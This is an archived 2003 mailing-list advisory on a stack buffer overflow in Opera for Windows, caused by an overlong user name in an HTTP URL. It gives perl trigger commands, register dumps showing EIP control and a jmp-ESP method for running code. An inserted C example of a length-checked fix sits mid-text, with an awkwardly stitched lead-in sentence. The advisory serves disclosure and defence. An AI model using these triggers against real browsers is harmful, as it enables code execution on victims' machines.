Opera Username Buffer Overflow Vulnerability

From: nesumin (nesuminat_private)
Date: Sat Feb 08 2003 - 23:47:46 PST


    Hello all.
    
    We are releasing information about a vulnerability in Opera here,
    and we hope that the vendor fixes it immediately.
    
        ___________________________________________________
    
    --------------------------------------------------------------
     Synopsis:    Opera Username Buffer Overflow Vulnerability
     Product:     Opera for Windows
     Version:     6.05 build1140 (and Opera7 beta2 build2577)
     Vendor:      Opera Software ASA (http://www.opera.com/)
     Risk:        High. Execution of arbitrary binary code
     Remote:      Yes
     Local:       Yes
     Discovered:  nesumin <nesuminat_private>
     Reported:    2003-02-02
     Published:   2003-02-09
    --------------------------------------------------------------
    
    Product :
    
      Opera for Windows is a GUI-based web browser.
      It has built-in mail, news and IM clients.
    
      Opera Software ASA
      http://www.opera.com/
    
    
    Overview :
    
      Opera 6.05 build 1140 (and Opera 7 beta2 build 2577) for Windows
      has a critical vulnerability.
      When Opera opens an HTTP URL that contains a long user name,
      a buffer overflow occurs on the stack.
    
      An attacker can trigger it through a link (anchor tag),
      a picture (image tag), a frame, a script, etc.
      The overflow can overwrite the saved RET address on the stack,
      which makes it possible to execute arbitrary binary code.
    
      If an Opera user opens a malicious URL,
      they may suffer damage such as system destruction,
      virus infection, etc.
    
    
    Tested on :
    
      Opera
        Opera 6.05 build 1140
        Opera 7 beta2 build 2577
        Opera 7.00 build 2637
        Opera 7.01 build 2651
    
        English edition and Japanese edition.
    
      Platform
        Windows98SE JP
        Windows2000 SP3 JP
        WindowsXP SP1 JP
    
    
    Vulnerable (among those tested) :
    
      Opera 6.05 build 1140
      Opera 7 beta2 build 2577
    
    
    Not vulnerable (among those tested) :
    
      Opera 7.00 build 2637
      Opera 7.01 build 2651
    
    
    Vendor status :
    
      Already reported on 2003/02/02.
      However, we do not know how Opera Software ASA intends to respond
      to this vulnerability, because we have not received a formal
      reply from Opera Software ASA.
    
    
    Solution :
    
      We propose the following temporary workaround until this
      vulnerability is fixed by the vendor.
    
      Delete the two "%s" from the string with resource number "21463"
      in the language file (*.lng).
      As a result, the user name and server name are no longer displayed
      in the URL warning dialog.
    
    
    Details :
    
      When Opera opens an HTTP URL that contains a user name, it uses
      the format string with resource number "21463" from the language
      file to generate the string displayed in the "URL Warning Dialog".
    
      Because there is no length check on the user name, specifying a
      long user name overflows a local buffer on the stack.
      (The length of the whole URL is restricted.)
    
      The RET address can be overwritten with about 2624 characters
      (stored as 16-bit wide characters); the exact number depends on
      the string of resource "21463".
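      The defect described above, a resource format string expanded into a
      fixed stack buffer with no check on the user-name length, beside the
      check that prevents it. This is an added example in C and not Opera's
      code; the buffer size, the user-name cap and the parser are assumptions
      for illustration. It is exercised with the shape of the advisory's
      test URL ("http://" followed by 2624 'A's and "@/").

```c
#include <stdio.h>
#include <string.h>
/* Assumed sizes for illustration (the advisory gives neither): the fixed
   stack buffer the dialog text is built in, and a cap on the user name. */
#define WARN_BUF 256
#define MAX_USER  64

struct urlinfo { const char *user; size_t ulen; const char *host; size_t hlen; };

/* Split "http://user[:pass]@host/..." into user name and host without copying.
   Returns 0 on success, -1 if the URL carries no userinfo part. */
int parse_userinfo(const char *url, struct urlinfo *u) {
    const char *p, *at, *slash, *colon;
    if (strncmp(url, "http://", 7) != 0) return -1;
    p = url + 7;
    slash = strchr(p, '/');
    at = strchr(p, '@');
    if (!at || (slash && at > slash)) return -1;  /* '@' must precede the path */
    colon = memchr(p, ':', (size_t)(at - p));     /* optional ":password" */
    u->user = p;
    u->ulen = (size_t)((colon ? colon : at) - p);
    u->host = at + 1;
    u->hlen = slash ? (size_t)(slash - u->host) : strlen(u->host);
    return 0;
}

/* Hardened counterpart of the advisory's sprintf(buf, fmt_21463, user, host):
   length-check the user name, then format with a bounded snprintf(). Returns
   0 ok, -1 no user name, -2 user name over the cap, -3 output would not fit. */
int build_warning_safe(const char *url, char *out, size_t outlen) {
    struct urlinfo u; int n;
    if (parse_userinfo(url, &u) != 0) return -1;
    if (u.ulen > MAX_USER) return -2;
    n = snprintf(out, outlen, "Username: %.*s  Server: %.*s",
                 (int)u.ulen, u.user, (int)u.hlen, u.host);
    return (n < 0 || (size_t)n >= outlen) ? -3 : 0;
}

/* Build "http://" + n 'A's + "@/" (the shape of the advisory's test URL) and
   run the hardened builder on it; returns its status code. */
int check_long_username(size_t n) {
    static char url[7 + 4096 + 3];
    char out[WARN_BUF];
    if (n > 4096) return -99;
    memcpy(url, "http://", 7);
    memset(url + 7, 'A', n);
    memcpy(url + 7 + n, "@/", 3);
    return build_warning_safe(url, out, sizeof out);
}
```

      With the check in place the 2624-character user name is rejected with
      -2 before any formatting happens, instead of being written past the
      end of the stack buffer.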
    
    
      [Opera 6.05 build 1140, English language file]
    
      $ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"
    
      ---------------------------------------------------------------------
      Exception C0000005
      EAX=00410041   EBX=01B5F9BA   ECX=0012E254   EDX=01B60E58   ESI=01A8A940
      EDI=77DF6001   EBP=0012E278   ESP=0012CDD8   EIP=00423D68 FLAGS=00000216
    
      0012CDD8  00000110  00000001  005F2464  00200020  ........d$_. . .
      0012CDE8  00200020  00730055  00720065  0061006E   . .U.s.e.r.n.a.
      0012CDF8  0065006D  0020003A  00410041  00410041  m.e.:. .A.A.A.A.
      0012CE08  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
        ....
      0012E268  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
      0012E278 >00410041  00410041  007D0020  007C031E  A.A.A.A. .....|.
      0012E288  01A8A940  007D02D0  0012E2D8  00000000  @.....}...E.....
      ---------------------------------------------------------------------
    
    
      In the above case, an access violation occurs before EIP reaches
      the RET address. However, EIP can be controlled by placing fake
      values, such as 0x80000001, in the area that is dereferenced
      after the overwrite.
    
    
      $ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"
    
        "%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
        (with the "Encode all addresses with UTF-8" setting enabled.)
    
      ---------------------------------------------------------------------
      Exception C0000005
      EAX=00000001   EBX=005F2464   ECX=00010101   EDX=F03639D8    ESI=00000001
      EDI=00000110   EBP=80000001   ESP=0012E28C  *EIP=FEFEFEFE  FLAGS=00000202
      ---------------------------------------------------------------------
    
    
      The ESP register points about 0x10 bytes past the position of
      the RET address's offset value.
    
      Therefore, it is possible to execute arbitrary binary code by
      overwriting the RET address with the address of a "jmp ESP"
      instruction and placing the binary code after the area pointed
      to by the ESP register.
    
      In Opera 7.0 build 2637 or later, we could not confirm
      this vulnerability.
    
    
      [Note]
    
      The user name written into the buffer through this vulnerability
      is converted to 16-bit wide characters.
    
      When the "Encode all addresses with UTF-8" setting is enabled
      and the user name is given in UTF-8 (or a similar encoding),
      the exploit data can easily be placed on the stack.
    
      If that setting is disabled, it becomes very difficult.
    
    
    Sample Code : (attached file)
    
      o6unexp.c
    
      This program is a generator that creates exploit HTML files.
      Test-compiled with Visual C++ 6.
    
      * This source code is only a sample for checking the vulnerability.
      * The user is responsible for whatever results from running
        this code.
    
    
    Special thanks :
    
      :: Operash ::
      [ Unofficial Opera's Bug and Security information site for Japanese people ]
      
      imagine (Operash webmaster)
      melorin
    
    
    Contacts, Etc :
    
      nesumin <nesuminat_private>
    
    
      The contents of this information are not guaranteed.
      We may correct the contents of this information from time to time.
      We take no responsibility for any damage caused by using
      this information.
    
        ___________________________________________________
    
    
    
    --------------------------------------------------
    nesumin <nesuminat_private>
    
    
    
    



    This archive was generated by hypermail 2b30 : Mon Feb 10 2003 - 09:36:51 PST